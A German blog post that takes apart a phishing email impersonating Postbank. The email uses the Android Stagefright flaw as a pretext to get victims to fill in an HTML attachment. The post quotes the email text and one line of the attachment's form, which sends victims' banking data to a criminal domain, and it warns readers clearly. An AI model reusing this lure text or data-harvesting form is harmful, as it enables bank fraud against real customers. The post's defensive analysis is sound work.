Das Wichtigste vorab: Diese E-Mail kommt nicht von der Postbank. Es ist Phishing und der Versuch, ihnen einen Trojaner unterzujubeln. Löschen sie diese E-Mail! Wenn sie das mir als „irgendeinem dahergelaufenen Blogger“ nicht glauben wollen (was durchaus vernünftig ist, denn sie kennen mich nicht und ich kann ein beliebiger Vollidiot sein), überzeugen sie sich davon, indem sie kostenlos bei der Postbank-Hotline für Sicherheitsfragen unter der Telefonnummer 0800 1008906 anrufen und dort noch einmal nachfragen! Und nachdem sie dort die Bestätigung gehört haben, löschen sie diese Spam! Die Postbank versendet solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank irgendwelche Daten irgendwo einzugeben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen monatelangen Ärger aller Art einbringen kann. Und wenn sie schon die Hotline anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr gefährlichen laufenden Betrugsnummer noch nicht prominent auf der Kundenwebsite der Postbank gewarnt wird, denn zurzeit scheint bei der Postbank noch niemand auf diese naheliegende Idee gekommen zu sein – obwohl dort ansonsten geradezu vorbildlich auf gängige Betrugsmaschen hingewiesen wird. Eine prominent platzierte Warnung könnte so viel Schaden verhindern und kostet dabei so wenig Aufwand…
So, jetzt aber…
Es war ja klar, dass die Spammer darauf aufspringen würden. Wer auch nur eine Spur Verantwortung fühlt, wird allerdings niemals auf die Idee gekommen sein, seine Kontoführung mit einem Wischofon¹ zu machen – denn in diesen werksseitig funktionslimitierten Computern für Dumme verbindet sich die Security-Blauäugigkeit der Neunziger Jahre mit der technisch kompetenten organisierten Kriminalität der Zehner Jahre.
Tja, und wer seine Kontoführung nicht mit so einem gefährlichen Spielzeugtelefon macht, der lacht schon beim Anblick des Betreffs, lehnt sich zurück und hat eine Möglichkeit weniger, mit derart plumpen Nummern überrumpelt zu werden.
Diese Spam habe ich übrigens nicht selbst empfangen, sie wurde mir von einem Freund mit Konto bei der Postbank zugesteckt, der schon wegen des…
Von: „Postbank.de“ <do-not-reply@postbank.de>
…in der Spam angegebenen Absenders verunsichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zeiten gemerkt, das der Absender einer E-Mail ohne Aufwand gefälscht werden kann und somit gar nichts über die Herkunft einer E-Mail sagt. Was Banken tun können, um solche Verunsicherungen bei Empfängern von kriminellen Phishing-Spams zu verhindern, habe ich schon vor vier Jahren geschrieben und werde es hier nicht wiederholen. Dass die meisten Banken immer noch nichts tun, ist ein Beleg dafür, dass ihnen ihre Kunden egal sind und dass sie sich nicht daran stören, wenn Kriminelle das Geld ihrer Kunden für dicke Autos, Kokain und Prostituierte ausgeben können. Als Kunde einer solchen Bank würde ich die darin ausgedrückte Verachtung in vollem Umfang zurückgeben und mir einen seriöseren Dienstleister für meine Geldsachen suchen.
Sehr geehrte/r Kunde,
Weder kennt diese „Postbank“ den Namen des Empfängers, noch macht sie eine Angabe, auf welches Konto sich diese Mail bezieht². Spätestens an dieser Stelle sollte jedem Empfänger klar sein, dass es sich um eine Spam handelt.
Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.
Ich gehe darauf inhaltlich nicht weiter ein, außer vielleicht diese eine Kleinigkeit: Es geht bei Stagefright nicht um „Daten per MMS stehlen“, sondern um „beliebigen Code in eine MMS (oder ein irgendwie, zum Beispiel bei einem Hangout, vom Wischofon verarbeitetes Video) einbetten und unbemerkt ausführen“. Der „Postbank Sicherheitszentale“ aus der wirren Kopfwelt dieser Spammer scheint das nicht so völlig klar zu sein, und offenbar setzen die Kriminellen auch darauf…
Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]
…dass ihre Opfer mit dem verlinkten Artikel auf Zeit Online intellektuell überfordert sind. Das sind ja immerhin Buchstaben, die Text formen, der gelesen werden will – und übrigens recht unklar ist, da er mutmaßlich von einem Journalisten ohne vertiefte technische Kenntnisse verfasst wurde. Eine etwas klarere Darlegung gibt es bei Heise Online.
So schützt die Postbank Sie!
1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!
Aha, die „Postbank“ schützt mich, indem ich den Anweisungen folge. Vielleicht sollten die „Sicherheitsexperten“ dort mal einen Deutschexperten einstellen, damit die Formulierungen nicht so mies klingen… 😀
2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!
Ein Klick auf „Click here“ in einer digital unsignierten Mail eines Unbekannten ist immer ein ganz besonders großer Beitrag zur Computersicherheit…
3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“
Ich denke, die „Postbank“ will mich schützen. Stattdessen soll ich einen Anhang öffnen und ausfüllen. Dieser Anhang ist übrigens eine HTML-Datei. Wer Interesse daran hat: den Quelltext habe ich bei Pastebin hochgeladen. Das Wichtigste steht in Zeile 110, ich habe hier mal den interessanten Teil isoliert:
<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>
Die eingegebenen Daten gehen nicht an einen Server in der Domain der Postbank, sondern über die obskure und vor ein paar Tagen anonym registrierte Domain adress (strich) datenabgleich (punkt) com
an einen von Verbrechern kontrollierten Server, der zu diesem Zeitpunkt erfreulicherweise schon vom Internet genommen wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so langsam wie die Postbank sein, wenn millionenfacher Betrug durchgeführt wird…)
Welche Daten das sind? Diese Daten hier:
Wer den Verbrechern so Zugriff auf das Postbank-Konto gegeben hat und ihnen bestätigt hat, unter welcher Adresse die Spam ankommt und beklickt wird, darf sich schon „freuen“:
Der nigelnagelneue Trojaner, den garantiert noch kein Antivirus-Schlangenöl kennt, wird gleich hinterhergeliefert.
Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.
Die allerdings sehr naheliegende Frage, warum die „Postbank“ nicht gleich jedem ihrer angemailten Kunden eine E-Mail mit einer derartigen Software zusenden sollte, die beantwortet der freundliche Phisher und Cracker nicht.
Übrigens ist „Stagefright“ kein Virus, außer vielleicht in einem eher skurillen Sinn des Wortes. Es ist eine schwere, auf vielerlei Wegen ausbeutbare Sicherheitslücke in Android.
Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion
Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.
¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.
²Es ist gar nicht selten, dass jemand mehrere Konten hat.